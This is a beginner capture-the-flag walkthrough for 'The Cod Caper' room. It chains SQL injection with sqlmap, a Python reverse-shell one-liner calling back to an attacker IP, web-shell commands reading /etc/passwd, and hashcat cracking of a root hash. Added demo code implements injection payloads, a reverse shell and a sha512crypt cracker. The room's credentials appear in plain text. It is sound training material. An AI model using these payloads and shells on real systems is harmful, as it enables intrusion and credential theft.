FOREWORD: We all get stuck, which is why write-ups exist. However, I would suggest you try your best to come up with the correct answer before seeking it here. Most problems are meant to be solved, but a process must be followed, which is why I explain the various steps and commands used to arrive at a solution. Do your best! Enjoy the process!
This room is a beginner-friendly room that allows users to infiltrate and exploit a Linux-based system.
No answer needed
The objective of this task is to obtain as much information as possible about any open ports on the given machine.
Useful flags:
Flag | Use |
---|---|
-p | Specifies which port(s) to scan; a range can be given, i.e. -p 1-1000 |
-sV | Probes open ports to identify the service and version running on them |
-sC | Runs nmap's default scripts against open ports for basic analysis of the services |
-A | Aggressive mode: enables OS detection, version detection, script scanning and traceroute |
To get this result a port scan must be run against the given IP address. Following the guide provided, I came up with
nmap -p 1-1000 -sC -A <GIVEN IP ADDRESS>
(-A already implies -sC and -sV, so the explicit -sC is redundant but harmless) which provides the following output and the answers to all of the questions in this section:
From the given output it is determined that there are 2 open ports on the target machine. The remaining answers for this section can be read straight from the scan output:
Web page title: Apache2 Ubuntu Default Page: It works
SSH service: OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Web server: Apache/2.4.18
The objective of this task is to research the web server for any vulnerabilities using gobuster, a brute-force directory and file enumeration tool.
Recommended tool: gobuster
Flag | Use |
---|---|
dir | Directory/file enumeration mode (gobuster also has dns and vhost modes) |
-u | Specifies the target URL |
--wordlist | Specifies the wordlist whose entries are appended to the URL path, i.e. "http://url.com/word1", "http://url.com/word2" (-w is the short form) |
-x | Specifies file extensions to try for each word, such as php,txt,html |
-t | Specifies the number of concurrent threads (default 10) |
The objective of this task is simple. The goal is to familiarize the user with useful commands needed to navigate servers in order to locate potential vulnerabilities.
From the previous exercise using nmap I found that port 80 is open on the machine, so I checked in the browser using the given IP, which leads to the Apache default page.
With this information I am now able to use gobuster (included in Kali) to enumerate directories. Combining the given flags with the given IP address and the common.txt wordlist:
gobuster dir -u <GIVEN IP ADDRESS> --wordlist /usr/share/wordlists/dirb/common.txt -x html,php,txt
I came up with the following result:
Based on the output, administrator.php seems to be an important file that would contain valuable information that could be exploited.
For this task the objective is to successfully crack the password to the administrator account using sqlmap, an open-source tool that automates finding and exploiting SQL injection.
Flag | Use |
---|---|
-u | Specifies the URL to be attacked |
--forms | Parses the forms on the page and automatically tests their parameters |
--dump | Retrieves the table contents once an injection is found |
-a | Retrieves everything from the database (same as --all) |
A SQL injection must be performed against the login form to obtain this information, and sqlmap automates it. I used:
sqlmap -u http://<GIVEN IP ADDRESS>/administrator.php --forms --dump
which gives this result and access to the website:
From the dumped output of the previous task we get the administrator password: secretpass
Once we are able to access the site we are brought to a command prompt screen. To find the number of vulnerabilities I simply re-used the command from question 1 WITHOUT the --dump option, since we are only looking for how many injections sqlmap finds:
sqlmap -u http://10.10.220.130/administrator.php --forms
This reports 3 forms of SQLi.
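To see the bug class that sqlmap is exploiting behind administrator.php, here is an added example (not code from the room or from this write-up) of a login check written the way a vulnerable PHP page typically is, beside the parameterised version that survives the same input. The in-memory SQLite table, its layout and the guest row are constructed for the demo; only the administrator/secretpass pair comes from the write-up, and the three payloads are common injection shapes chosen to illustrate the point, not a reproduction of sqlmap's test sequence.

```python
import sqlite3

# Constructed stand-in for the database behind administrator.php; the table layout and
# the guest row are assumptions. The administrator/secretpass pair is the write-up's.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("administrator", "secretpass"), ("guest", "guest123")])
    return db

def login_vulnerable(db, username, password):
    # The bug sqlmap exploits: user input is spliced into the SQL text, so a quote in the
    # input ends the string literal and the remainder is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in db.execute(query).fetchall()]

def login_safe(db, username, password):
    # Parameterised query: the driver passes the values separately from the SQL text,
    # so a quote in the input is just a character inside a string.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(query, (username, password)).fetchall()]

# Three common injection shapes (constructed payloads).
BYPASS = "' OR '1'='1"                        # boolean-based: the WHERE clause is always true
COMMENT = "administrator' -- "                # comments out the password check entirely
DUMP = "' UNION SELECT username || ':' || password FROM users -- "   # what --dump automates

def demo():
    db = build_db()
    print("vulnerable, always-true payload :", login_vulnerable(db, BYPASS, BYPASS))
    print("vulnerable, comment payload     :", login_vulnerable(db, COMMENT, "anything"))
    print("vulnerable, union dump          :", login_vulnerable(db, DUMP, ""))
    print("safe, always-true payload       :", login_safe(db, BYPASS, BYPASS))
    print("safe, real credentials          :", login_safe(db, "administrator", "secretpass"))

if __name__ == "__main__":
    demo()
```

The UNION payload is the manual form of what sqlmap --dump does: once one injectable string parameter exists, the attacker chooses what the query returns, and the login "result" becomes a channel for reading the whole users table.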
This section requires research to determine if the user's old account is still active. If it is, we need to find whether specific files remain.
I obtained this answer by running ls in the command screen we gained access to in the previous exercise. The following output shows that there are 3 files:
To begin, open a listening port with netcat on your own machine:
nc -lnvp 1234
A reverse shell is needed to run the commands necessary to solve this problem. Note that the address in the payload is your attacking machine's IP (where the netcat listener runs), not the target's, because the target connects back to you. I used:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR ATTACKER IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
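As an added example that is not part of the write-up, the following Python script reproduces the reverse-shell mechanics end to end on localhost: a listener plays the part of nc -lnvp, the "victim" connects back and hands the socket to /bin/sh as its stdin, stdout and stderr (the one-liner does the same with os.dup2), and the listener sends commands and reads the output. It assumes a Linux or macOS host with /bin/sh; the port is chosen by the OS and the command script is constructed for the demo.

```python
import socket
import subprocess
import threading

def start_listener(host="127.0.0.1", port=0):
    # Plays the part of `nc -lnvp 1234` on the attacking machine. Port 0 lets the OS pick
    # a free port for the demo; it is returned so the "victim" knows where to connect.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]

def reverse_shell(attacker_host, attacker_port, shell=("/bin/sh",)):
    # Victim side. The address is the ATTACKER's: the connection goes outbound from the
    # target back to the listener, which is what makes it a "reverse" shell.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((attacker_host, attacker_port))
    fd = s.fileno()
    # The one-liner does os.dup2(fd, 0/1/2) and then runs sh, so the shell's stdin,
    # stdout and stderr are the socket; passing fd to Popen has the same effect for the
    # child without clobbering this interpreter's own stdio.
    proc = subprocess.Popen(list(shell), stdin=fd, stdout=fd, stderr=fd)
    rc = proc.wait()
    s.close()
    return rc

def run_demo(commands=("echo pwned-$((6*7))", "echo done", "exit")):
    # Constructed command script for the demo; the attacker thread sends it down the
    # socket as soon as the victim calls back, then reads until the shell exits.
    srv, port = start_listener()
    captured = {}

    def attacker():
        conn, _ = srv.accept()
        conn.sendall(("\n".join(commands) + "\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
        conn.close()
        captured["output"] = b"".join(chunks).decode()

    t = threading.Thread(target=attacker)
    t.start()
    rc = reverse_shell("127.0.0.1", port)   # in the room: your attacking machine's IP
    t.join()
    srv.close()
    return rc, captured["output"]

if __name__ == "__main__":
    rc, out = run_demo()
    print("shell exited with", rc)
    print(out)
```

Everything typed into netcat in the room travels this same path: down the socket into sh's stdin, with the command output coming back over the same connection.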
To check /etc/passwd through the web shell I used curl, since we are sending POST data to the PHP page:
curl -s --data-urlencode "cmd=cat /etc/passwd" -X POST http://<GIVEN IP ADDRESS>/2591c98b70119fe624898b1e424b5e91.php | grep -v -e "^$" | grep -v "<"
The two grep filters drop empty lines and the HTML tags around the command output. The answer: yes
As you can see, "Pingu" is still listed as an account.
So we figured out that Pingu still has an account. Now we have to figure out the associated password. To do this we will use the find command to search the filesystem. My first thought was to look for any shadow files that may contain passwords:
find / 2>/dev/null | grep -i shadow
I found a shadow backup! Let's cat it to see the contents.
This didn't help. Next, I used find to search for any path containing "pass" (I switched to the webpage interface for this one):
find / 2>/dev/null | grep -i pass
This is what populates: /var/hidden/pass ! Let's cat this file.
We found the password pinguapingu !
Tools used in this task: netcat, sqlmap, Python reverse shell, curl.
In this task the objective is to download LinEnum and use it for privilege escalation.
First, I used ssh with the login information obtained in the previous task to log in as Pingu:
ssh pingu@<GIVEN IP ADDRESS>
Next I used find to locate SUID binaries:
find / -perm -u=s -type f 2>/dev/null
which gave me this:
A secret path? Sounds very interesting to me! /opt/secret/root
The next few tasks go over tools that can be used to carry out "binary exploitation". Everyone has their own way of doing things, so various exploitation methods are explained. There are no tasks to be completed, but there is a lot of information to retain and use for the final tasks.
No answer needed
No answer needed
No answer needed
This task requires us to crack the root hash obtained in the previous task: $6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk
The $6$ prefix identifies it as sha512crypt, which is hashcat mode 1800. It is recommended that we use the following syntax, hashcat {flags} {hashfile} {wordlist}, with the following flags:
Flag | Use |
---|---|
-a | Used to specify the attack mode (0 = straight, i.e. try each word of the wordlist) |
-m | Used to specify the hash type (1800 for a $6$ sha512crypt hash) |
I copied the hash into a file named llama.txt. Now I am going to attempt cracking it with:
hashcat -m 1800 -a 0 llama.txt /usr/share/wordlists/rockyou.txt
Let's see what we get! FYI, this may take a while.
Got it! love2fish
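As an added example (not the write-up's code), the following Python implements the sha512crypt algorithm that a $6$ hash denotes, following the published sha-crypt specification, and runs a small straight-mode dictionary attack with it, which is what hashcat -m 1800 -a 0 does at far greater speed. It also shows why the mode matters: the parser refuses anything that is not a $6$ hash. The wordlist is constructed for the demo; the salt rFK4s/vE is the one in the room's hash, and the demo hashes love2fish with it and recovers it, while crack() accepts a full /etc/shadow hash as well.

```python
import hashlib

# crypt(3)'s base64 alphabet (not the RFC 4648 one) and the byte permutation the
# sha-crypt specification applies to the final digest before encoding.
B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4), (47, 5, 26),
         (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51), (31, 52, 10), (53, 11, 32),
         (12, 33, 54), (34, 55, 13), (56, 14, 35), (15, 36, 57), (37, 58, 16), (59, 17, 38),
         (18, 39, 60), (40, 61, 19), (62, 20, 41)]

def encode_digest(d):
    out = []
    for b2, b1, b0 in ORDER:
        w = (d[b2] << 16) | (d[b1] << 8) | d[b0]
        for _ in range(4):
            out.append(B64[w & 0x3F])
            w >>= 6
    w = d[63]
    for _ in range(2):
        out.append(B64[w & 0x3F])
        w >>= 6
    return "".join(out)

def sha512crypt(password, salt, rounds=5000):
    pw, sb = password.encode(), salt.encode()[:16]          # salt is capped at 16 bytes
    b = hashlib.sha512(pw + sb + pw).digest()
    a = hashlib.sha512(pw + sb)
    a.update((b * (len(pw) // 64 + 1))[:len(pw)])             # len(pw) bytes taken from B
    n = len(pw)
    while n:                                                  # bits of len(pw), LSB first
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]
    ds = hashlib.sha512(sb * (16 + a[0])).digest()
    s = (ds * (len(sb) // 64 + 1))[:len(sb)]
    c = a
    for i in range(rounds):                                   # the cost: 5000 SHA-512s by default
        h = hashlib.sha512()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    cost = "" if rounds == 5000 else "rounds=%d$" % rounds
    return "$6$" + cost + sb.decode() + "$" + encode_digest(c)

def parse_sha512crypt(h):
    # Accepts $6$salt$digest and $6$rounds=N$salt$digest. Anything else is a different
    # hash type, which is the mistake behind pointing hashcat -m 0 (MD5) at a $6$ hash.
    f = h.split("$")
    if len(f) < 4 or f[1] != "6":
        raise ValueError("not a sha512crypt hash (expected a $6$ prefix, hashcat mode 1800)")
    rounds = 5000
    if f[2].startswith("rounds="):
        rounds = int(f[2][7:])
        del f[2]
    return rounds, f[2], f[3]

def crack(shadow_hash, wordlist):
    # Straight-mode dictionary attack (hashcat -a 0): hash each candidate with the target's
    # salt and rounds, compare the encoded digest, return the first match or None.
    rounds, salt, digest = parse_sha512crypt(shadow_hash)
    for word in wordlist:
        if sha512crypt(word, salt, rounds).rsplit("$", 1)[1] == digest:
            return word
    return None

if __name__ == "__main__":
    # Constructed wordlist; the salt rFK4s/vE is the one in the room's root hash.
    target = sha512crypt("love2fish", "rFK4s/vE")
    print(target)
    print("cracked:", crack(target, ["password", "123456", "letmein", "love2fish"]))
```

The 5000-round loop is the whole reason rockyou takes "a while": every candidate costs thousands of SHA-512 computations, and the salt means the work cannot be shared between hashes, so a GPU cracker like hashcat is the right tool rather than a Python loop.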
This room was a bit difficult for me and took longer than I expected. I spent a lot of time researching various tools and commands I found myself unfamiliar with. However, in the end I completed it, which is all that matters!
Congratulations on completing The Cod Caper !